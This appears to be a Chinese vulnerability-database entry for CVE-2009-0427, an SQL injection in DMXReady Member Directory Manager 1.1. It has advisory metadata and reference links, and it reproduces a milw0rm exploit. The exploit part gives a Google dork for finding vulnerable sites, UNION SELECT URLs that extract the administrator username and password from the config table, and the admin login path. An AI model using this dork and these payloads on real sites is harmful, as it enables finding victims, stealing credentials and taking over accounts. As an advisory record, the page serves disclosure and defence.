DMXReadyMember Directory Manager 'upload_image_category.asp' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117236 漏洞类型 SQL注入
发布时间 2009-01-14 更新时间 2009-02-04
CVE编号 CVE-2009-0427 CNNVD-ID CNNVD-200902-109
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7773
https://www.securityfocus.com/bid/80628
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-109
|漏洞详情
MemberDirectoryManager是Netkinetic公司开发的一款成员管理软件。DMXReadyMemberDirectoryManager1.1及之前版本中的CategoryManager/upload_image_category.asp存在SQL注入漏洞。远程攻击者可以借助cid参数,执行任意的SQL指令。
|漏洞EXP
*******************************************************************************
# Title   :  DMXReady Member Directory Manager <= 1.1 SQL Injection Vulnerability
# Author  :  ajann
# Contact :   :( 
# S.Page  :  http://www.dmxready.com
# $$      :  99.97 $
# Dork    :  inurl:inc_memberdirectorymanager.asp
# DorkEx  :
http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_memberdirectorymanager.asp&meta=

****Stop Attack ABD and ISRAEL !


*******************************************************************************

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=[SQL Inject]

You Find-> http://[target]/[path]/applications/MemberDirectoryManager/inc_memberdirectorymanager.asp
Edit     -> http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=[SQL Inject]


Example:

USERNAME->
/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminUserName,4,3,2,1 from tblMDM_config

PASSWORD->
/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminPassword,4,3,2,1 from tblMDM_config

Admin Login->
/admin/MemberDirectoryManager/admin.asp

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2009-01-14]
|受影响的产品
DMXReady Member Directory Manager 1.1
|参考资料

来源:XF
名称:memberdirectory-uploadimage-sql-injection(47960)
链接:http://xforce.iss.net/xforce/xfdb/47960
来源:BID
名称:33253
链接:http://www.securityfocus.com/bid/33253
来源:SECUNIA
名称:33482
链接:http://secunia.com/advisories/33482
来源:MILW0RM
名称:7773
链接:http://milw0rm.com/exploits/7773
来源:dmxready.helpserve.com
链接:http://dmxready.helpserve.com/index.php?_m=news&_a=viewnews&newsid=12
来源:dmxready.helpserve.com
链接:http://dmxready.helpserve.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=93